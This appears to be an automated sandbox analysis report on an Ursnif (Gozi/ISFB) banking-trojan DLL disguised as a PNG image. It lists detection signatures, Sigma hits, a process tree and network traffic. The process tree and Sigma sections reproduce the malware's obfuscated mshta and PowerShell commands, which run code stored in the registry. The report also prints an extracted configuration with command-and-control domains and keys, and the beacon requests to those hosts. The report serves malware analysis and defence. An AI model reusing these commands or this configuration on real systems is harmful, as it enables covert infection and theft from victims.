
Windows Analysis Report 6.png

Overview

General Information

Sample Name: 6.png (renamed file extension from png to dll)
Analysis ID: 539457
MD5: ac57d694b86d8532b38d3d62f6de3afc
SHA1: c858ec742ba91bf8c139b7bb654ca2d67747c5ef
SHA256: fa668d1a58b3b92d9c1b9a740facfaebb35dd723deaf5a3833592208a8a47e5e
Tags: dll, exe, geofenced, Gozi, isfb, ITA, ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Maps a DLL or memory area into another process
Writes to foreign memory regions
PE file has a writeable .text section
Writes or reads registry keys via WMI
Machine Learning detection for sample
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Registers a DLL
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6360 cmdline: loaddll32.exe "C:\Users\user\Desktop\6.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6376 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6400 cmdline: rundll32.exe "C:\Users\user\Desktop\6.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 4904 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 3492 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 6388 cmdline: regsvr32.exe /s C:\Users\user\Desktop\6.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 4912 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • rundll32.exe (PID: 6424 cmdline: rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • control.exe (PID: 6580 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • BackgroundTransferHost.exe (PID: 5876 cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1 MD5: 02BA81746B929ECC9DB6665589B68335)
  • mshta.exe (PID: 4036 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5760 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6152 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 1488 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7012 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6552 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3620 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 3520 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
  • mshta.exe (PID: 3696 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6188 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6796 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 496 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3532 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6248 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6540 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{
  "RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=",
  "c2_domain": [
    "microsoft.com/windowsdisabler",
    "windows.update3.com",
    "berukoneru.website",
    "gerukoneru.website",
    "fortunarah.com"
  ],
  "botnet": "8899",
  "server": "12",
  "serpent_key": "56473871MNTYAIDA",
  "sleep_time": "10",
  "CONF_TIMEOUT": "10",
  "SetWaitableTimer_value": "0",
  "DGA_count": "10"
}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

System Summary:

Sigma detected: MSHTA Spawning Windows Shell
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4036, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 7132
Sigma detected: Suspicious Call by Ordinal
Source: Process started | Author: Florian Roth | Data: Command: rundll32.exe "C:\Users\user\Desktop\6.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\6.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6376, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\6.dll",#1, ProcessId: 6400
Sigma detected: Mshta Spawning Windows Shell
Source: Process started | Author: Florian Roth | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4036, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 7132
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7012, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline, ProcessId: 6552
Sigma detected: Suspicious Rundll32 Activity
Source: Process started | Author: juju4, Jonhnathan Ribeiro, oscd.community | Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 4904, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 3492
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4036, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 7132
Sigma detected: T1086 PowerShell Execution
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132839804557459233.7132.DefaultAppDomain.powershell

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000004.00000002.913785412.0000000000D60000.00000040.00000001.sdmp | Malware Configuration Extractor: Ursnif {"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}
Machine Learning detection for sample
Source: 6.dll | Joe Sandbox ML: detected
Source: 6.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49796 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49797 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49799 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49801 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49802 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49803 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49806 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49807 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49808 version: TLS 1.2
Source: Binary string: ntdll.pdb | source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP | source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.pdb561934e089 | source: powershell.exe, 00000019.00000003.455310412.00000254DC7BD000.00000004.00000001.sdmp

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: berukoneru.website
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 79.110.52.144 187
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: windows.update3.com
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 18.219.227.107 187
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 3.12.124.139 187
Source: Joe Sandbox View | ASN Name: V4ESCROW-ASRO V4ESCROW-ASRO
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global traffic | HTTP traffic detected: GET /tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic | HTTP traffic detected: GET /tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic | HTTP traffic detected: GET /tire/fGFKjH5BjbdZz4tmUO5m/ZAUfPXxElw8Dkm9Cfh9/xqmrK6ieQrOr54I1y1Md2B/CJZjvCZRXK_2B/c6YLK40A/ibGCXB5z8qRJaf9iUFEBazW/9sEXIVndb3/DsRsV2z8TCrjx7mBI/rTZxp021lQBU/ESMggS1gJ_2/Bi3Bcj9_2B8Xf4/Xr9j2PgVhY9_2FzIeDatB/WE3DM_2B4ZBLmr9g/bExshi993/JbJC0wJJ/U.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic | HTTP traffic detected: GET /tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic | HTTP traffic detected: GET /tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic | HTTP traffic detected: GET /tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic | HTTP traffic detected: GET /tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAo/f_2Bdm0MJPWq7ugWEYUqSU/PtgL_2FeeZv0h/UCRQYI_2/FefNYP32vk23pbK3jV8vqXP/0Ovr3EWUID/eiKH_2Fkr5cf0tXqX/_2BscW0pxtbY/lmzrmCcsUPq/Hp_2BA_2BliXkb/fgGnQnQH8/_2B.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
